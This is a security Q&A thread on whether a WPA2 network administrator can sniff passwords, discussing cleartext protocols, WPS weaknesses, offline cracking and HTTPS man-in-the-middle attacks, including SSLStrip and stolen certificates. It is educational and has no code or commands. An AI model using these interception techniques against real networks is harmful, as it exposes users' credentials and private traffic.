Is it possible, that the network administrator (wpa2 wifi network) can log all the data the users send and then get password out of it?
I know it is not possible to get the password if I'm surfing with https but what if I only use http pages?
Add a comment
|
3 Answers
On any Wi-Fi network - encrypted or not, given today's Wi-Fi encryption protocols - any sufficiently skilled and equipped user of the network (and especially the network administrator) could easily access any data you transmit or receive via cleartext protocols. This includes usernames and passwords as well as web pages, documents, and other data sent or obtained via http, ftp, telnet, etc.
For open networks, gathering cleartext data is as easy as sniffing the traffic in the air. WEP security adds a slight barrier, but is still easily decipherable by even unauthenticated users.
WPA and WPA2 require a good bit more computational power for outsiders to crack, and much more time. For these, an attacker would most likely monitor traffic for awhile and then take the data home for offline cracking. As with just about any cryptography, brute force will always win if given enough time. With WPA and WPA2, that just means a lot of time.
There are side-channel attacks to WPA and WPA2 though. Currently, the Wi-Fi Protected Setup (or similar) features in most SOHO routers has a weakness that will allow an attacker to gain access to your network in fairly short time. Once they've cracked your key through this method, they can join the network like any other user (provided you don't have other protections - most of which are trivially bypassable - in place).
For WPA and WPA2, there are known weaknesses that allow authenticated users (or attackers who have broken into the network) to sniff traffic as if it were unprotected. At this point, the only defense you have is encryption at higher levels of the network stack (i.e.: HTTPS). Even then, many of these higher-level protocols can be subjected to man-in-the-middle (MitM) attacks if the victim is less than vigilant in verifying their SSL certificates (or the attacker has a certificate from a compromised CA).
The only real additional threat that a malicious network administrator would pose, is that they have access to the wired side of the network also. On the wire, traffic is not protected by the same encryption (WEP/WPA/WPA2) that applies to the wireless connection. Anyone on the wire could then sniff your traffic as if it had been sent across an open (unprotected) network on the air.
-
-
4@hanssii - Then you're no longer using a cleartext protocol, as far as the local network is concerned. However, any data you send over http, ftp, etc. is now instead at the mercy of the administrators of whatever network you've VPNed to.– IsziCommented Sep 8, 2011 at 17:42
-
3I think the comments about WPA and WPA2 are potentially misleading. Saying that they are crackable with sufficient computational power, while accurate in principle, may be misleading: as far as I know, if the password is unguessable, the amount of computational power required may exceed your expected life expectancy, or that of the universe. The known weaknesses in WPA2 (and, I presume, WPA) apply primarily if the attacker knows the crypto key: if the attacker doesn't know the keys, the password is strong, and the router doesn't have the WPS vulnerability, WPA2 is hard to crack.– D.W.Commented Mar 12, 2012 at 22:35
-
1@D.W.Your statements are correct. However, the question was asking particularly if the network administrator may be able to sniff encrypted WiFi traffic. The network admin, by virtue of his role, will most likely have the PSK. Therefore he (as well as any other user joined to the WiFi network, and therefore also in possession of the PSK) will be able to take advantage of the WPA/WPA2 weaknesses I've mentioned.– IsziCommented Jul 23, 2013 at 18:14
-
Is it possible to sniff a WPA2 protected wi-fi when you're not a user of it?– galmeidaCommented Jul 15, 2017 at 1:15
Iszi has good points on cleartext protocols, however you can still attack as MITM if the user is using HTTPS.
For example if the administrator terminates the HTTPS on his side and you accept his faulty certificate, the administrator can then decrypt and view your requests in plaintext.
Tools like SSLStrip can also be usefull when attacking HTTPS as MITM. The only difference for the user is usually that a supposed HTTPS site is instead provided as HTTP. Would you notice?
answered Sep 8, 2011 at 19:04
I know it is not possible to get the password if I'm surfing with https ...
It is not possible, if you only use authorized certificates. If you don't use these, there can be man-in-the-middle, which just passes his SSL certificate to you and reads all the encrypted connection.
-
1Or if someone hacks one of the trusted root CAs. But that's unlikely to happen; at least not more often than every 6 months or so. (yup, Diginotar's fake *.google.com certificates appeared "authorized"; and there was Comodo before that, and Etilasat) Unfortunately, even "valid", signed by a trusted root CA SSL certificates are no guarantee of a secure connection nowadays. Commented Sep 9, 2011 at 12:51
-
@Piskvor - yes this is a fundamental weakness in
https(having to trust random CAs)--guaranteed security doesn't exist. However, you should recognize that the server at the other end of thehttpsconnection is often an easier target than getting a trusted root CA certificate. (E.g., the attacker pays an admin to copy the actual certificate from/etc/ssl/private/, which is then used in the MITM attack). However, the nice thing is that to get the certificate the attacker must have gotten root on their server and probably could get of your private data off of it already. Commented Mar 12, 2012 at 17:57 -
@dr jimbob: Sure, subverting an individual server should be harder than subverting a CA. Commented Mar 12, 2012 at 19:50